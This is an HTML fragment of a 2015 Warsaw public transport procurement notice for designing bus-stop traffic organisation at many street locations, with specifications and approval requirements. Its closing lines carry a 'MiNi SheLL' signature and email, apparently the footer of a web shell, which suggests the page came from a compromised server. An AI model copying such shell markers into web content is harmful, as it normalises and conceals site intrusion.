<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Termin realizacji - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień niniejszej Umowy,
w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy,
w następującym zakresie i w przypadku zaistnienia następujących okoliczności:
1) w przypadku braku możliwości dokonania z odpowiednimi organami i instytucjami
koniecznych uzgodnień lub uzyskania opinii bądź decyzji w terminach określonych
odpowiednimi przepisami do części Przedmiotu Umowy lub całości Przedmiotu
Umowy, skutkiem czego nie będzie możliwe wykonanie części lub całości Przedmiotu
Umowy, zgodnie z postanowieniami Umowy,
2) zmiany wynikającej ze zmian w Wieloletnich Prognozach Finansowych i/lub planach
finansowych Zamawiającego,
3) wykrycia odmiennych od przyjętych w SIWZ warunków terenowych w szczególności
istnienia niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów
budowlanych i innych przeszkód,
4) zmiany terminów i wysokości wynagrodzenia określonych w Umowie, wynikających
ze zmian, o których mowa powyżej w pkt od 1) do 3).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ztm.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego, pok. nr 216.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2015 godzina 10:00, miejsce: Siedziba Zamawiającego, pok. nr 7 - Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.Przedmiotem Zamówienia jest opracowanie projektów stałej organizacji ruchu dla uruchomienia przystanków autobusowych dla następujących lokalizacji: 
1.w ul. Jana Kazimierza, Dzielnica Wola - wyznaczenie 5 par  przystanków (w tym 9 przystanków  bez zatok + 1 w zatoce do odtworzenia), związane jest z uruchomieniem nowej linii  autobusowej mającej kursować w obu kierunkach ulicami: Kasprzaka - Ordona - Jana Kazimierza - Studzienną (docelowo Hubalczyków) Wolską/Połczyńską. Uruchomienie przystanków autobusowych umożliwi mieszkańcom ciągle rozrastającego się osiedla mieszkaniowego  połączenia z innymi środkami komunikacji miejskiej z innymi liniami autobusowymi i tramwajowymi na ul. Wolskiej/Połczyńskiej, ulica na całej długości jest dwukierunkowa o szer. 10 m, miejscowo na końcowym odcinku 12 m, nawierzchnia bitumiczna
- długość prostej krawędzi przystanków po 20 m
- proponowane wskazania lokalizacyjne dla poszczególnych przystanków wzdłuż ulicy Jana 
  Kazimierza w kierunku południowo-zachodnim  pokazane w załącznikach A 1:   
  1.1. w rejonie skrzyżowania z ul. Ordona,
  1.2  w rejonie skrzyżowania z ul. Gizów,
  1.3. w rejonie skrzyżowania z ul. Goleszowską,
  1.4. w rejonie skrzyżowania z ul. J. Sowińskiego, lokalizacja jednego z przystanków w istniejącej zatoce  do odtworzenia, która obecnie funkcjonuje jako parking dla 
                samochodów osobowych,
 1.5. w rejonie skrzyżowania z ul. Hubalczyków 
  2.    w ul. Podleśnej, Dzielnica Bielany - wyznaczenie 1 przystanku w zatoce, za skrzyżowaniem 
         z  ul. Klaudyny w kierunku ul. Marymonckiej,  związane   jest  ze  zmianą  organizacji  dla  
         linii autobusowej - przeniesienie istniejącego przystanku sprzed skrzyżowania z ul. Klaudyny 
         za to skrzyżowanie;  jezdnia  jest dwukierunkowa o szer. 7 m o nawierzchni bitumicznej, w 
         projekcie należy uwzględnić likwidację oznakowania pionowego i poziomego dla obecnie 
         funkcjonującego przystanku
   - długość prostej krawędzi przystanku 20 m 
   - proponowane wskazania lokalizacji przystanku wzdłuż ulicy Podleśnej w 
     kierunku południowo - zachodnim pokazane w załączniku  A 2
   3.     w ul. Conrada,  Dzielnica  Bielany,  wyznaczenie  2  przystanków   bez   zatok  w rejonie 
           kościoła na odcinku między pętlą Chomiczówka  i skrzyżowaniem z al. Reymonta związane  
           z  jest  poprawieniem  komfortu pasażerów i  umożliwieniem  korzystania  z   komunikacji  
           miejskiej użytkownikom pobliskiego  osiedla mieszkaniowego, firm, kościoła,   istniejące 
           przystanki znajdują się w zbyt dużej odległości od siebie; jezdnia jest dwukierunkowa w 
           nawierzchni bitumicznej o  szerokości 13 m rozdzielona pasem bezpieczeństwa;
    - długość prostej krawędzi przystanków po 40 m 
    - proponowane wskazania lokalizacyjne przystanków wzdłuż ulicy Conrada w 
     kierunku północno - zachodnim i południowo - wschodnim pokazane w załączniku  A 3
    4.   w  ul. Modlińskiej,  Dzielnica Praga - Północ,   wyznaczenie  2   przystanków  w   zatokach 
          lub bez zatok (do rozstrzygnięcia przez projektanta), związane jest z utworzeniem 
         dodatkowych przystanków dla linii  autobusowych  kursujących ul. Modlińską 
          i skomunikowanie z węzłem przesiadkowym na pętli autobusowej oraz tramwajowej; ulica na  
          całej  długości  jest  dwukierunkowa,   trzypasmowa o nawierzchni bitumicznej; zachodzi 
          konieczność uzgodnienia z GDDK i A planu zagospodarowania terenu i propozycji 
          lokalizacyjnych przystanków (teren objęty gwarancją)
   - proponowane wskazania lokalizacyjne przystanków wzdłuż ulicy Modlińskiej pokazane 
     w załączniku A 4:
  1.1  dla przystanku w kierunku północno-zachodnim (na Białołękę) za wiaduktem Trasy 
         Toruńskiej w rejonie Kościoła; w projekcie należy uwzględnić likwidację obecnie 
         funkcjonującego przystanku czasowego pod wiaduktem
         - długość prostej krawędzi przystanku  20 m
  1.2. dla przystanku w kierunku południowo-wschodnim w kierunku ul. Jagiellońskiej, za 
         skrzyżowaniem z ul. Elektronową
         - długość prostej krawędzi przystanku 40 m        
    5.   w ul. Smoczej, Dzielnica Wola - wyznaczenie 2 przystanków bez zatok w rejonie 
          skrzyżowania z ul. Anielewicza związane   jest z przeniesieniem przystanku Smocza 01 
          sprzed za skrzyżowanie z ul. Anielewicza oraz utworzeniem dodatkowego przystanku na 
          wysokości szkoły zmniejszającego odległości między istniejącymi sąsiednimi  przystankami 
          w tym kierunku;  jezdnia  jest dwukierunkowa o szerokości 9,20 m, nawierzchnia bitumiczna;
          - długość prostej krawędzi dla obu przystanków po 20 m 
   - proponowane wskazania lokalizacji przystanków wzdłuż ulicy Smoczej w kierunku 
   południowo-wschodnim pokazane w załącznikach  A 5:
   1.1  dla przystanku  w kierunku za skrzyżowaniem z ul. Anielewicza, na wysokości nr 11 
          (lokalizacja wynikająca z przeniesienia przystanku Smocza 01), rejon skrzyżowania z    
          ul. Milą; w projekcie należy uwzględnić likwidację przystanku Smocza 01
   1.2. dla  przystanku w kierunku  przed skrzyżowaniem z ul. Anielewicza, na wysokości nr 19.  
II.	Wykonawca wykona Przedmiot Zamówienia w sposób zgodny z obowiązującymi przepisami, w tym w szczególności zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 23 września 2003 r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem (Dz. U. z 2003 r. Nr 177, poz. 1729).
W projekcie stałej organizacji ruchu należy uwzględnić następujące uwarunkowania:
1)długość krawędzi przystankowej w linii prostej (pas przejazdowo-postojowy - zatoka) 
2)szerokość jezdni w zatoce 3 m,
3)pochylenie poprzeczne jezdni w zatoce 2 % w kierunku krawędzi jezdni,
4)szerokość peronów przystankowych - min. 2,00 m (nawiązując do istniejących chodników lub zaprojektować  ciągi piesze zapewniające dojścia do peronów), 
na peronach w odległości  nim.1,5  m od krawędzi jezdni należy zapewnić  wolną przestrzeń na której nie mogą znajdować się żadne elementy niezwiązane z  funkcją przystanku  (słupy, latarnie, skrzynki elektryczne, parkometry, drzewa),   
5) Wzdłuż krawędzi peronu przystankowego należy zastosować:
       a. krawężnik systemowy peronowy (typu Kassel Kerb) o wysokości 16 cm, z nawierzchnią 
           antypoślizgową,
       b. płytę wskaźnikową z wypustkami (wzór kwadrat) koloru żółtego,    
6) Zamawiający nie przewiduje na projektowanych przystankach usytuowania wiat 
       przystankowych,
7) należy dążyć do sytuowania przystanków na gruntach stanowiących własność m. st. Warszawy   
       i Skarbu Państwa,
8) należy dążyć do takiego usytuowania przystanków, aby zminimalizować ryzyko powstania 
       kolizji z sieciami uzbrojenia terenu.
Wskazane na załącznikach lokalizacje przystanków mają charakter orientacyjny. Zamawiający dopuszcza również lokalizacje przystanków w sąsiedztwie pod warunkiem optymalnego powiązania projektowanych przystanków z istniejącym układem komunikacyjnym.
Wymagane opinie i zatwierdzenia projektów organizacji ruchu:
1)Działu Organizacji Przewozów Zarządu Transportu Miejskiego,
2)Wydziału Ruchu Drogowego Komendy Stołecznej Policji,
3)Zarządu Dróg Miejskich,
4)Biura Drogownictwa i Komunikacji Urzędu m. st. Warszawy (w przypadku zmiany geometrii jezdni),
5)Zarządu Oczyszczania Miasta (w przypadku kolizji z drzewami, krzewami),
6)zatwierdzenie Inżyniera Ruchu m. st. Warszawy.
III.	Projekty stałej organizacji ruchu należy opracować na postawie aktualnych map ZUD do celów projektowych pozyskanych z Biura Geodezji i Katastru Urzędu m. st. Warszawy w 4 egz. w formie papierowej oraz 1egz. w wersji elektronicznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Termin realizacji - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.Przedmiotem Zamówienia jest opracowanie projektów stałej organizacji ruchu dla nowych przystanków autobusowych dla następujących lokalizacji: 
1.  rejon skrzyżowania ul. Łabiszyńskiej i ul. Łojewskiej, Dzielnica Targówek  - wyznaczenie 3     przystanków związanych jest z   podniesieniem komfortu dla pasażerów  i poprawą dostępności do komunikacji miejskiej w tym rejonie, polegające na bardziej racjonalnym połączeniu linii autobusowych funkcjonujących w tym obrębie, proponowane wskazania lokalizacyjne przystanków w załącznikach B 1
1.1.  w ul. Łabiszyńskiej - wyznaczenie 1 przystanku autobusowego w zatoce na szerokim 
               pasie zieleni, za skrzyżowaniem z ul. Łojewską w  kierunku do ul. Kondratowicza po 
               zachodniej stronie ulicy,  jezdnia  jest dwukierunkowa o szer. 10 m, nawierzchnia  
               bitumiczna, w pasie zieleni występuje szpaler drzew, w projekcie należy uwzględnić 
               likwidację funkcjonującego przystanku w ul. Łojewskiej w rejonie skrzyżowania   
               - długość prostej krawędzi przystanku 40 m
               - wskazania lokalizacyjne przystanku na wysokości nr 23, pokazane w załączniku B 1.1.
1.2.  w ul. Łojewskiej - wyznaczenie 1 przystanku bez zatoki, za skrzyżowaniem z ul. 
              Turmoncką, po północnej stronie ulicy, jezdnia jest dwukierunkowa  o szerokości 10 m, 
               nawierzchnia bitumiczna, usytuowanie przystanku na starym przystanku nienormatywnym 
               do odtworzenia, obecnie funkcjonującym jako parking dla samochodów osobowych
               - długość prostej krawędzi przystanku 40 m;
               - wskazania lokalizacyjne przystanku na wysokości nr 23, pokazane w załączniku B 1.2.
1.3.  w ul. Łojewskiej - na istniejącym przystanku za skrzyżowaniem z ul. Turmoncką od 
                Łabiszyńskiej, na południowej stronie ulicy obecnie funkcjonującym, wyznaczyć 
                przystanek poprzez wydłużenie prostej krawędzi przystanku o 10 m do długości 40 m;
                - wskazania lokalizacyjne przystanku na wysokości nr 23, pokazane w załączniku B 1.3.
2. w ul. Roentgena  - wyznaczenie 2 przystanków w zatokach lub bez zatok (do rozstrzygnięcia przez projektanta) ma na celu poprawienie  dostępności  komunikacji miejskiej dla  pasażerów pobliskiego osiedla mieszkaniowego jedno-  i wielorodzinnego, a także  dla pacjentów szpitala onkologicznego, jezdnia jest dwukierunkowa o szerokości 13,5 m z pasem rozdzielającym 2 m,  nawierzchnia asfaltowa, proponowane wskazania lokalizacyjne przystanków w załączniku B 2
1.2.  przystanek w kierunku ul. Makolągwy, w rejonie nr 16, w kierunku południowo-
               zachodnim, długość prostej krawędzi zatoki 40 m
2.2.  przystanek  w kierunku ul. Pileckiego, w kierunku północno-wschodnim, długość prostej  
               krawędzi zatoki 20 m   
 3.   w ul. Piłsudskiego (Wesoła) - wyznaczenie 2 przystanków w zatokach o długości po 20 m w rejonie skrzyżowania z ul. Mazowiecką, jezdnia jest dwukierunkowa o szerokości 6,5 m, nawierzchnia bitumiczna, jezdnia z poboczem nieutwardzonym o szerokości od 2-2,5 m, bez chodników, występuje duże natężenie pojazdów, proponowane wskazania lokalizacyjne przystanków w załączniku B 3
3.1. przystanek w kierunku północnym za skrzyżowaniem z ul. Mazowiecką, na wysokości nr    
              4A - 4D, w sąsiedztwie proponowanej lokalizacji występują drzewa
3.2. przystanek w kierunku południowym za skrzyżowaniem z ul. Mazowiecką w kierunku 
              Traktu Brzeskiego, ulica graniczy z terenem zalesionym
4.   w ul. Saskiej - we  wskazanych lokalizacjach wydłużenie istniejących  2 przystanków do 40 m prostej krawędzi peronu, zwiększenie parametrów dla obu przystanków ma na celu poprawienie jakości i bezpieczeństwa taboru autobusowego dużej ilości kursujących linii obsługiwanej przez przystanki, jezdnia jest dwukierunkowa o szerokości 11,5 m, nawierzchnia bitumiczna, lokalizacja przystanków pokazana w załączniku B4
4.1.  przystanek w kierunku południowym do trasy Łazienkowskiej, istniejącą nienormatywną  
       zatokę należy przebudować do długości 40 m prostej krawędzi wraz z dopłytowaniem  peronu do 40 m
 4.2.  przystanek w kierunku północnym do al. Waszyngtona bez zatoki należy wydłużyć do 40 
          m w istniejącej lokalizacji nie przekraczając linii czoła autobusu i wjazdu publicznego  
 5.   w ul. Kondratowicza - wyznaczenie 4 przystanków bez zatok związane jest z powstaniem 
        nowej zabudowy wielorodzinnej i zapewnienie zwiększenia dostępności do komunikacji     
        miejskiej dla pasażerów  osiedli mieszkaniowych wielorodzinnych i jednorodzinnych, jezdnia jest   dwukierunkowa o szerokości 7 m, nawierzchnia bitumiczna, wyznaczenie 2 par przystanków, proponowane wskazania lokalizacyjne wzdłuż ul. Kondratowicza pokazane w załączniku B 5 
        - długość prostych krawędzi przystanków po 20 m
      5.1. para przystanków w rejonie skrzyżowania ul. Blokowej i ul. Przy Grodzisku, 
              5.1.1.  przystanek w kierunku zachodnim do  ul. św. Wincentego, 
              5.1.2.  przystanek w kierunku wschodnim do Radzymińskiej
       5.2. para przystanków w rejonie skrzyżowania ul. Bohuszewiczówny, które mają przejąć 
              funkcję istniejących przystanków w rejonie skrzyżowania z ul. Kleopatry przeznaczonych 
              do likwidacji w chwili uruchomienia przystanków w nowych lokalizacjach, oznakowanie 
              pionowe i poziome dla obecnie funkcjonującego przystanku należy uwzględnić w 
              projekcie
              5.2.1.   przystanek w kierunku zachodnim do ul. św. Wincentego,
              5.2.2.   przystanek w kierunku wschodnim do ul. Radzymińskiej.
  6.   w ul. Mickiewicza, Dzielnica Żoliborz - wyznaczenie 1 przystanku bez zatoki, za przejściem 
        dla pieszych  w kierunku północnym za skrzyżowaniem z ul. Bohomolca,  związane   jest  z 
        przeniesieniem i likwidacją istniejącego przystanku Bohomolca 02  jezdnia  jest 
        dwukierunkowa  o nawierzchni bitumicznej; w projekcie należy uwzględnić likwidację 
        oznakowania pionowego i poziomego dla obecnie funkcjonującego przystanku
   - długość prostej krawędzi przystanku 20 m
   - proponowane wskazania lokalizacji przystanku wzdłuż ulicy Mickiewicza w  pokazane w 
     załączniku  B 6
II.Wykonawca wykona Przedmiot Zamówienia w sposób zgodny z obowiązującymi przepisami, w tym w szczególności zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 23 września 2003 r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem (Dz. U. z 2003 r. Nr 177, poz. 1729).
W projekcie stałej organizacji ruchu należy uwzględnić następujące uwarunkowania:
1)długość krawędzi przystankowej w linii prostej ( pas przejazdowo-postojowy/zatoka) 
2)szerokość jezdni w zatoce 3 m,
3)pochylenie poprzeczne jezdni w zatoce 2 % w kierunku krawędzi jezdni,
4)szerokość peronu przystankowego - min. 2,00 m (nawiązując do istniejących chodników lub zaprojektować  ciągi piesze zapewniające dojścia do peronów), 
na peronach w odległości  nim.1,5  m od krawędzi jezdni należy zapewnić  wolną przestrzeń, na której nie mogą znajdować się żadne elementy niezwiązane z  funkcją przystanku  (słupy, latarnie, skrzynki elektryczne, parkometry, drzewa),
 5)   Wzdłuż krawędzi peronu przystankowego należy zastosować:
        a. krawężnik systemowy peronowy (typu Kassel Kerb) o wysokości 16 cm, z nawierzchnią 
antypoślizgową,
        b. płytę wskaźnikową z wypustkami (wzór kwadrat) koloru żółtego,    
  6)   Zamawiający nie przewiduje na projektowanych przystankach usytuowania wiat  
         przystankowych,
  7)   należy dążyć do sytuowania przystanków na gruntach stanowiących własność m. st. Warszawy 
        i Skarbu Państwa,
  8)   należy dążyć do takiego usytuowania przystanków, aby zminimalizować ryzyko powstania   
        kolizji z sieciami uzbrojenia terenu.
Wskazane na załącznikach lokalizacje przystanków mają charakter orientacyjny. Zamawiający dopuszcza również lokalizacje przystanków w sąsiedztwie pod warunkiem optymalnego powiązania projektowanych przystanków z istniejącym układem komunikacyjnym.
Wymagane opinie i zatwierdzenia projektów organizacji ruchu:
1)Działu Organizacji Przewozów Zarządu Transportu Miejskiego,
2)Wydziału Ruchu Drogowego Komendy Stołecznej Policji,
3)Zarządu Dróg Miejskich,
4)Biura Drogownictwa i Komunikacji Urzędu m.st. Warszawy(w przypadku zmiany geometrii 
       jezdni),
5)Zarządu Oczyszczania Miasta (w przypadku kolizji z drzewami, krzewami),
6)zatwierdzenie Inżyniera Ruchu m. st. Warszawy.
III.  Projekty stałej organizacji ruchu należy opracować na postawie aktualnych map ZUD do celów 
        projektowych pozyskanych z Biura Geodezji i Katastru Urzędu m. st. Warszawy w 4 egz. w 
        formie papierowej oraz 1egz. w wersji elektronicznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Termin realizacji - 15</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com